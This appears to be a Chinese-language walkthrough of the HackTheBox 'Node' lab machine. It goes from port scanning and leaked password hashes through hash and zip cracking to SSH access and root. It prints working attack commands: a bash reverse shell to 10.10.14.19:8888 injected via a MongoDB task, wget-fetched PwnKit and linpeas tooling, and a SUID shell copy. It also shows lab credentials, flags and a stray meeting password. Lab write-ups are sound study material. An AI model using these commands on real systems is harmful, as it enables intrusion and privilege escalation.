11-Node
10.10.10.58
1、PortScan
上来端口扫描,masscan扫全端口,nmap快速扫前100端口
┌──(xavier㉿kali)-[~]
└─$ sudo masscan 10.10.10.58 -p1-65535 -e tun0 --max-rate 500
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 -F 10.10.10.58
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 18:00 CST
Nmap scan report for 10.10.10.58
Host is up (0.43s latency).
Not shown: 98 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.20 seconds
Raw packets sent: 204 (8.952KB) | Rcvd: 5 (204B)
盲猜一手80端口,猜错了,nmap扫描结果出来了,3000端口存在HTTP服务
接下去看下这个http服务,同时后台不能停,在用nmap扫一遍全端口。(因为网络问题,查漏补缺,避免错过信息。)
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 -p- 10.10.10.58
扫描结果只开放了这两个端口。
Nmap 对开放的端口进行脚本扫描:
┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 -p22,3000 10.10.10.58 -sC
[sudo] xavier 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-12 18:06 CST
Nmap scan report for 10.10.10.58
Host is up (0.70s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc5e34a625db43eceb40f4967b8ed1da (RSA)
| 256 6c8e5e5f4fd5417d1895d1dc2e3fe59c (ECDSA)
|_ 256 d878b85d85ffad7be6e2b5da1e526236 (ED25519)
3000/tcp open hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.45 seconds
2、WebScan
对http访问进行目录枚举,同时自己也去分析Web
┌──(xavier㉿kali)-[~]
└─$ dirsearch -e php,html,txt -t 100 -u http://10.10.10.58:3000/ -r -x 403
┌──(xavier㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 100 --timeout 10s -u http://10.10.10.58:3000/ --exclude-length 3861
首页三个人名,收集一下,可能爆破账号会用到。
tom
mark
rastating
在分析过程中,突然在Burp中看到了这么一个数据包,泄露了敏感信息,直接返回了用户名和密码😆!
三个哈希:
[{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
hash 碰撞
hashcat碰撞失败,待分析
将这三个哈希写入文件中,试着碰撞hash,破解明文:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: pthread--0x000, 708/1480 MB (256 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashfile 'hash.txt' on line 1 (f0e2e7...6a5c3f7c8d1d0191451ec77b4d75f240): Token length exception
Hashfile 'hash.txt' on line 2 (de5a1a...7f1057b61b7119fd130e1f7428705f73): Token length exception
Hashfile 'hash.txt' on line 3 (5065db...b97e231e3fe88570abc9edd8b78ac2f0): Token length exception
* Token length exception: 3/3 hashes
This error happens if the wrong hash type is specified, if the hashes are
malformed, or if input is otherwise not as expected (for example, if the
--username option is used but no username is present)
No hashes loaded.
Started: Thu Apr 13 00:49:27 2023
Stopped: Thu Apr 13 00:49:27 2023
失败,hahscat无法处理给定的哈希值。
没办法,转而求助在线网站,比如cmd5,解出明文如下:
tom/spongebob
mark/snowflake
rastating/未查到
通过在线平台确定散列算法是sha256,再去用hashcat指定散列算法碰撞一下试试。
密码哈希可以用hash-identifier判断加密形式
$ hashid <hash>
sha256对应的散列编号为1400,参考:https://hashcat.net/wiki/doku.php?id=example_hashes
也可以这样查询编号:
$ hashcat -h gre SHA-256
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt -O
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 3.1+debian Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: pthread--0x000, 708/1480 MB (256 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 31
Hashes: 3 digests; 3 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Optimized-Kernel
* Zero-Byte
* Precompute-Init
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
* Device #1: Not enough allocatable device memory for this attack.
Started: Thu Apr 13 01:23:17 2023
Stopped: Thu Apr 13 01:23:26 2023
hashcat我也不是很熟练,干脆列一下有关hashcat的参考文档,有时间再去整理
有关hashcat的参考文档:
https://rednode.com/pentest/hashcat-cheat-sheet/
https://hashcat.net/wiki/doku.php?id=example_hashes
这个报错不是很好解决,AI的回答:
这个错误通常意味着您的设备(GPU)内存不足以执行所选攻击。这可能是由于使用了太大的哈希文件或字典文件,或者因为您同时在破解多个哈希时尝试使用过多的设备。
以下是一些可能有助于解决此问题的方法:
- 减小要攻击的哈希文件或字典文件的大小,以减少内存占用。
- 尝试使用更少的设备来执行攻击,以减少每个设备的负担。
- 如果您正在使用多个GPU,请确保它们都有相同的内存大小,并且 hashcat 版本与 GPU 驱动程序版本匹配。
- 还可以尝试提高设备上的虚拟内存限制,但这可能会影响系统性能和稳定性。
- 最后,如果您的设备仍然无法满足要求,您可能需要考虑购买更具有内存容量的GPU设备。
希望这些建议能帮助您解决问题。
因为已经有2个普通用户了,少一个用户也没什么吧。
除了hashcat,还可以用 john去碰撞:
$ john --format=Raw-SHA256 --wordlist=/usr/share/dict/rockyou.txt hash.txt
# 查看
$ john --show hash.txt
$ cat ~/.john/john.pot
3、WebUser
使用tom/spongebob,成功登录普通用户后台。
提示语意为:“当前仅管理员用户可以访问控制面板,但请稍后再检查以测试标准用户功能!”
对该网站的流量进行分享,看到有个数据包包含如下信息:
说明当admin用户登录时,会有一个DownloadBackup按钮,我们可以修改返回数据包的is_admin
字段欺骗前端,也可以直接追踪backup()
这个JS方法。
backup()
方法会去向/api/admin/backup
请求,这个接口存在鉴权,非admin用户无法通过鉴权。
这时候又进了一个死胡同,回头看一下,刚才我们Web扫描只跑了根目录,这里有/api/接口,那就枚举一下/api/路径,因为我们已经有了一个普通用户权限,我还可以加上普通用户的cookie,看能否获取到更多线索。
┌──(xavier㉿kali)-[~]
└─$ dirsearch -e jsp,php,html,txt -t 100 -u http://10.10.10.58:3000/api/ -r -x 403 --cookie="connect.sid=s%3A3FNQmGFnn_Cgl_OhItoMdDFYP_PzbP38.sjAgbwVSZQMWfvjO96GJ3hcWIFgNCVcwmqBxayGha50"
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: jsp, php, html, txt | HTTP method: GET | Threads: 100 | Wordlist size: 10396
Output File: /home/xavier/.dirsearch/reports/10.10.10.58-3000/-api-_23-04-13_01-54-49.txt
Error Log: /home/xavier/.dirsearch/logs/errors-23-04-13_01-54-49.log
Target: http://10.10.10.58:3000/api/
[01:54:50] Starting:
[01:55:09] 200 - 23B - /api/admin/backup/ (Added to queue)
[01:55:44] 200 - 176B - /api/session
[01:55:45] 200 - 176B - /api/session/ (Added to queue)
[01:55:51] 200 - 611B - /api/users/ (Added to queue)
[01:55:51] 200 - 611B - /api/users
最终在/api/users
接口下发现了好东西:
后面发现,事实上这个接口是未授权的,即使删除cookie也可以获取到敏感信息。
现在我们有了admin权限账号的用户名和密码sha256哈希:
{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},
也是去找cmd5进行解密,得到用户名密码:
myP14ceAdm1nAcc0uNT/manchester
4、WebAdmin
这回我们用admin权限的账号登录,页面是这样的:
点击按钮,没什么好犹豫的。不知道前方还有什么在等待着我们。
成功下载一个3.3M的备份文件
应该是个压缩包,要判断一下文件格式
filetype
这块也不太熟,多做些尝试
修改后缀为zip,gz,tar.gz,都失败了
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ file myplace.backup
myplace.backup: ASCII text, with very long lines (65536), with no line terminators
# 还是不知道是什么
仔细看文件内容有点像base64编码后的,试着解码。
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ cat myplace.backup | base64 -d > 1.txt
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ ls -l
总计 9304
-rw-r--r-- 1 xavier xavier 2594909 4月13日 02:23 1.txt
-rw-r--r-- 1 xavier xavier 65 4月13日 00:55 hash1.txt
-rw-r--r-- 1 xavier xavier 195 4月13日 01:21 hash.txt
-rw-r--r-- 1 xavier xavier 3459880 4月13日 02:09 myplace.backup
-rw-r--r-- 1 xavier xavier 3459880 4月13日 02:17 myplace.backup.png
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ head 1.txt
PK
▒�Uvar/www/myplace/UT ��b��6dux
PK E"KL}�74S!var/www/myplace/package-lock.jsonUT ���YK��Yux
从文件头 PK 能判断处是个zip格式文件,修改后缀并解压
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ mv 1.txt 1.zip
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ unzip 1.zip
Archive: 1.zip
creating: var/www/myplace/
[1.zip] var/www/myplace/package-lock.json password:
😧 还需要密码,想想。。。
crack zip
枚举zip密码,通过john the ripper枚举
john the ripper:这是一个强大的密码破解工具,可以用于破解zip文件密码以及其他密码。您可以使用命令“zip2john 文件名.zip > hash.txt”将zip文件转换为john可识别的格式,然后使用命令“john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt”运行john进行破解。
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ zip2john 1.zip > ziphsh.txt
Created directory: /home/xavier/.john
ver 1.0 1.zip/var/www/myplace/ is not encrypted, or stored with non-handled compression type
[...pass...]
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt ziphsh.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (1.zip)
1g 0:00:00:00 DONE (2023-04-13 02:34) 50.00g/s 9830Kp/s 9830Kc/s 9830KC/s 24782478..piggy9
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到解压密码magicword
还有一些其他工具也可以用作zip密码枚举:
fcrackzip:这是一个基于字典的工具,它使用字符串列表来尝试解密受密码保护的zip文件。您可以使用命令“fcrackzip -b -v -D -p /usr/share/wordlists/rockyou.txt 文件名.zip”运行fcrackzip。
zipcracker:这是一个基于暴力的工具,用于破解zip文件密码。您可以使用命令“zipcracker -b -c charset -l length -u -s 文件名.zip”运行zipcracker。
敏感信息搜集
对备份文件进行敏感信息搜集
package.json暴露坂本
MongoDB 2.2.x
App.js 暴露MongoDB连接用户名、密码
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
5、Mongo & SSH
尝试连接数据库,失败:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ mongo 10.10.10.58:27017/myplace -u mark -p 5AYRft73VtFpc84k
MongoDB shell version v6.0.1
connecting to: mongodb://10.10.10.58:27017/myplace?compressors=disabled&gssapiServiceName=mongodb
Error: couldn't connect to server 10.10.10.58:27017, connection attempt failed: SocketException: Error connecting to 10.10.10.58:27017 :: caused by :: Connection timed out :
connect@src/mongo/shell/mongo.js:380:17
@(connect):2:6
exception: connect failed
exiting with code 1
回忆一下,最初也没有发现27017端口开放,暂时搁置。
上面我们收获了MongoDB的登录口令,不妨试一下用SSH登录:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ ssh mark@10.10.10.58
mark@10.10.10.58's password:
[...pass...]
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ whoami
mark
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)
也可以用sshpass直接登录
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ sshpass -p 5AYRft73VtFpc84k ssh mark@10.10.10.58
[...pass...]
Last login: Wed Apr 12 20:18:30 2023 from 10.10.14.11
mark@node:~$ id
uid=1001(mark) gid=1001(mark) groups=1001(mark)
mark@node:~$
上去信息收集,可以直接传个linpeas.sh,用wget下载
mark@node:~$ wget http://10.10.14.11/linpeas.sh
--2023-04-13 03:15:44-- http://10.10.14.11/linpeas.sh
Connecting to 10.10.14.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776073 (758K) [text/x-sh]
linpeas.sh: Permission denied
Cannot write to 'linpeas.sh' (Success).
家目录不行,换/tmp路径
mark@node:~$ cd /tmp
mark@node:/tmp$ wget http://10.10.14.11/linpeas.sh
--2023-04-13 03:17:02-- http://10.10.14.11/linpeas.sh
Connecting to 10.10.14.11:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776073 (758K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[=====================================================================>] 757.88K 336KB/s in 2.3s
2023-04-13 03:17:05 (336 KB/s) - 'linpeas.sh' saved [776073/776073]
自动化脚本信息收集,为提权做准备。
mark@node:/tmp$ chmod +x linpeas.sh
mark@node:/tmp$ ./linpeas.sh > result
手动信息可以看到本地存在MongoDB服务,开放了27017端口,可以考虑连上去看看。
mark@node:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 127.0.0.1:27017 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 324 10.10.10.58:22 10.10.14.11:59938 ESTABLISHED on (0.50/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36344 ESTABLISHED keepalive (99.75/0/0)
tcp 0 0 127.0.0.1:36344 127.0.0.1:27017 ESTABLISHED keepalive (34.86/0/0)
tcp 0 0 127.0.0.1:36336 127.0.0.1:27017 ESTABLISHED keepalive (4.78/0/0)
tcp 0 0 127.0.0.1:36340 127.0.0.1:27017 ESTABLISHED keepalive (49.83/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36342 ESTABLISHED keepalive (160.17/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36334 ESTABLISHED keepalive (244.14/0/0)
tcp 0 0 127.0.0.1:36338 127.0.0.1:27017 ESTABLISHED keepalive (39.85/0/0)
tcp 0 0 127.0.0.1:36342 127.0.0.1:27017 ESTABLISHED keepalive (19.88/0/0)
tcp 0 0 127.0.0.1:36334 127.0.0.1:27017 ESTABLISHED keepalive (47.53/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36338 ESTABLISHED keepalive (205.22/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36336 ESTABLISHED keepalive (19.88/0/0)
tcp 0 0 127.0.0.1:27017 127.0.0.1:36340 ESTABLISHED keepalive (64.94/0/0)
tcp6 0 0 :::3000 :::* LISTEN off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ] DGRAM 266744 /run/user/1001/systemd/notify
暂时搁置,还是先看linpeas.sh脚本的输出,进行一个分析。
这里先把结果下载回来,远程访问有点卡,使用scp下载:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ scp mark@10.10.10.58:/tmp/result .
mark@10.10.10.58's password:
Permission denied, please try again.
mark@10.10.10.58's password:
result 100% 138KB 11.9KB/s 00:11
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ cat result
根据结果,想到这么几个利用点
提权点
OS: Linux version 4.4.0-93-generic (buildd@lgw01-03) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017
sudo CVE-2021-4034
内核漏洞:
[+] [CVE-2017-16995] eBPF_verifier
[+] [CVE-2016-5195] dirtycow
[+] [CVE-2016-5195] dirtycow 2
[+] [CVE-2021-4034] PwnKit
[+] [CVE-2021-3156] sudo Baron Samedit 2
[+] [CVE-2017-7308] af_packet
[+] [CVE-2017-6074] dccp
[+] [CVE-2017-1000112] NETIF_F_UFO
[+] [CVE-2016-8655] chocobo_root
[+] [CVE-2016-4997] target_offset
[+] [CVE-2016-4557] double-fdput()
[+] [CVE-2021-3156] sudo Baron Samedit
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
[+] [CVE-2019-18634] sudo pwfeedback
[+] [CVE-2019-15666] XFRM_UAF
[+] [CVE-2018-1000001] RationalLove
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
[+] [CVE-2017-1000253] PIE_stack_corruption
[+] [CVE-2016-9793] SO_{SND|RCV}BUFFORCE
[+] [CVE-2016-2384] usb-midi
[+] [CVE-2016-0728] keyring
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
[1] af_packet CVE-2016-8655
[2] exploit_x CVE-2018-14665
[3] get_rekt CVE-2017-16695
╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root),1002(admin)
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
uid=1001(mark) gid=1001(mark) groups=1001(mark)
# 可以看到这个tom用户权限挺多的,可以考虑先提权到他
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/lxc
/usr/bin/make
/bin/nc
/bin/netcat
/usr/bin/perl
/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
# 有gcc,也许可以编译内核提权的EXP
╔══════════╣ Analyzing Mongo Files (limit 70)
Version: MongoDB shell version: 3.2.16
db version v3.2.16
git version: 056bf45128114e44c5358c7a8776fb582363e094
OpenSSL version: OpenSSL 1.0.2g 1 Mar 2016
allocator: tcmalloc
modules: none
build environment:
distmod: ubuntu1604
distarch: x86_64
target_arch: x86_64
-rw-r--r-- 1 root root 568 Jul 27 2017 /etc/mongod.conf
storage:
dbPath: /var/lib/mongodb
journal:
enabled: true
systemLog:
destination: file
logAppend: true
path: /var/log/mongodb/mongod.log
net:
port: 27017
bindIp: 127.0.0.1
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-- 1 root admin 17K Sep 3 2017 /usr/local/bin/backup (Unknown SUID binary)
# tom用户可以利用suid提权
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/mongodb/mongod.log
/var/log/syslog
/var/log/kern.log
/var/log/auth.log
/tmp/result
提权
方法一、漏洞提权
sudo CVE-2021-4034漏洞提权:
利用了编译好的工具:
mark@node:~$ cd /tmp
mark@node:/tmp$ wget http://10.10.14.11/PwnKit
mark@node:/tmp$ chmod +x PwnKit
mark@node:/tmp$ ./PwnKit
root@node:/tmp# id
uid=0(root) gid=0(root) groups=0(root),1001(mark)
root@node:/tmp# cat /root/root.txt
62b0adecc196c0b485be47a394d5b9a4
root@node:/tmp# cat /home/tom/user.txt
f08a2ecd696eedbb9adec6eb2b5a0036
root@node:/tmp#
服务器存在gcc,也可以把exp上传后再编译
搜索EXP:
┌──(xavier㉿kali)-[~/Desktop/HTB/011-Node]
└─$ searchsploit --cve 2021-4034
--------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------- ---------------------------------
PolicyKit-1 0.105-31 - Privilege Escalation | linux/local/50689.txt
--------------------------------------------- ---------------------------------
Shellcodes: No Results
这个版本编译的时候总报错,弃了。
方法二
换一种路线提权
目标是先提到tom用户
现在尝试连接MongoDB,看看里面有什么
mark@node:/tmp$ mongo 127.0.0.1:27017/myplace -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: 127.0.0.1:27017/myplace
> help
[...pass...]
>
> db.stats();
{
"db" : "myplace",
"collections" : 1,
"objects" : 4,
"avgObjSize" : 135.75,
"dataSize" : 543,
"storageSize" : 36864,
"numExtents" : 0,
"indexes" : 1,
"indexSize" : 36864,
"ok" : 1
}
> db.version();
3.2.16
MongoDB数据库的版本为3.2.16,没查到该版本的相关漏洞
没什么头绪,再回过头去看看linpeas.sh的输出,看看有什么是我们忽视的。
tom
之前搜集到了有个tom用户,应该是一个提权的对象,重点关注tom用户的信息,发现:
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes
[...pass...]
tom 1241 0.4 7.7 1112004 58628 ? Ssl Apr12 4:48 /usr/bin/node /var/www/myplace/app.js
mongodb 1242 0.4 11.2 288144 85212 ? Ssl Apr12 4:06 /usr/bin/mongod --auth --quiet --config /etc/mongod.conf
tom 1245 0.0 5.8 1008568 44708 ? Ssl Apr12 0:10 /usr/bin/node /var/scheduler/app.js
这里的敏感文件还没看,值得看一下。
/var/www/myplace/app.js
就是我们之前下载下来的backup,看下/var/scheduler/app.js
mark@node:~$ more /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
MongoClient.connect(url, function(error, db) {
if (error || !db) {
console.log('[!] Failed to connect to mongodb');
return;
}
setInterval(function () {
db.collection('tasks').find().toArray(function (error, docs) {
if (!error && docs) {
docs.forEach(function (doc) {
if (doc) {
console.log('Executing task ' + doc._id + '...');
exec(doc.cmd);
db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
}
});
}
else if (error) {
console.log('Something went wrong: ' + error);
}
});
}, 30000);
});
分析这段JS,给了我们命令执行的机会
这段 JavaScript 代码使用 MongoDB 的 Node.js 驱动程序来查询一个名为 ‘tasks’ 的集合中的所有文档,然后将这些文档存储在一个数组变量 docs 中。如果文档且没有错误,它会遍历每个文档并执行以下操作:
- 打印出正在执行任务的 _id(即该文档的 ID)。
- 使用 exec() 函数执行该文档中存储的命令(cmd 字段)。
- 从 ‘tasks’ 集合中删除该文档。
因为这个JS中给了连接MongoDB的命令,我们可以直接登录MongoDB,创建相关的数据,让上面的JS去执行我们的数据。就是这思路,创建反弹shell
连接数据库
mongoDB 命令参考:https://www.runoob.com/mongodb/mongodb-tutorial.html
mark@node:~$ mongo 127.0.0.1:27017/scheduler -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: 127.0.0.1:27017/scheduler
> db.stats()
{
"db" : "scheduler",
"collections" : 1,
"objects" : 0,
"avgObjSize" : 0,
"dataSize" : 0,
"storageSize" : 24576,
"numExtents" : 0,
"indexes" : 1,
"indexSize" : 24576,
"ok" : 1
}
> db.getCollectionNames()
[ "tasks" ]
> db.tasks.find()
> db.tasks.insert({cmd: '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.19/8888 0>&1"'})
WriteResult({ "nInserted" : 1 })
>
因为JS是一个删除功能,所以我们一定要在创建之前,先用nc进行监听,创建成功后,nc将会收到反弹shell:
┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.58] 46076
bash: cannot set terminal process group (1242): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$ id
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
tom@node:/$ tom@node:/$ cat /home/tom/user.txt
cat /home/tom/user.txt
2a3fb81c1a346d06b19e2d6a2151525b
记录一些他人的方法
db.tasks.insert( { "cmd" : "cp /bin/dash /tmp/bmfx; chown tom:admin /tmp/bmfx; chmod 6755 /tmp/bmfx;" })
等待一段时间后,执行
/tmp/bmfx -p
即可收获一个tom的shell
我看他人获取nc反弹shell后,会进行这么一个操作:
升级到完全交互式 shell:
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Background the session
(CTRL+ Z)
Type “fg”:
stty raw -echo;fg
Press enter a few times.
测试了一下有些时候会让shell混乱
会议号772821714,入会密码336457
root
拿到了Tom用户,第一时间就想到了之前发现的SUID文件/usr/local/bin/backup
,看一下。
tom@node:/$ ls -l /usr/local/bin/backup
ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
tom@node:/$ strings /usr/local/bin/backup
strings /usr/local/bin/backup
[...pass...]
%s[!]%s %s
[32m
%s[+]%s %s
%s[+]%s Starting archiving %s
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | Secure Backup v1.0 | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
Could not open file
Validated access token
Ah-ah-ah! You didn't say the magic word!
Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx